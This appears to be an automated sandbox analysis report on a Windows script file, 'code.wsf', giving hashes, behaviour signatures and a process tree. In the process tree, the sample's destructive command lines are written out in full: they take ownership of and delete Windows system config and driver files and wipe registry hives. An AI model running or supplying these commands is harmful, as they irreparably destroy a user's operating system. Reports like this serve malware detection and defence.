Analysis

  • max time kernel
    46s
  • max time network
    48s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:42

General

  • Target

    code.wsf

  • Size

    3KB

  • MD5

    57a8ed12915b612b81ec573f56394818

  • SHA1

    f834294e6d6a7150da076670825857960df8a7a2

  • SHA256

    0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

  • SHA512

    2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4672
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4828
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2996
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4868
      • C:\Windows\System32\reg.exe
        "C:\Windows\System32\reg.exe" delete HKCR\*.dll /f
        3⤵
          PID:1540
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" delete HKCR\*.exe /f
          3⤵
            PID:2604
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" delete HKLM\* /f
            3⤵
            • Modifies registry key
            PID:3324
      • C:\Windows\regedit.exe
        "C:\Windows\regedit.exe"
        1⤵
        • Runs regedit.exe
        • Suspicious behavior: GetForegroundWindowSpam
        PID:4116

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

        Filesize

        3KB

        MD5

        57a8ed12915b612b81ec573f56394818

        SHA1

        f834294e6d6a7150da076670825857960df8a7a2

        SHA256

        0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

        SHA512

        2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

      • C:\Users\Admin\Desktop\ConvertToMove.vbs

        Filesize

        77B

        MD5

        1fafd3091b9297603ea9989bed793089

        SHA1

        03688ce88040e39d04ec4a182427cf0992c827d6

        SHA256

        84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac

        SHA512

        8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571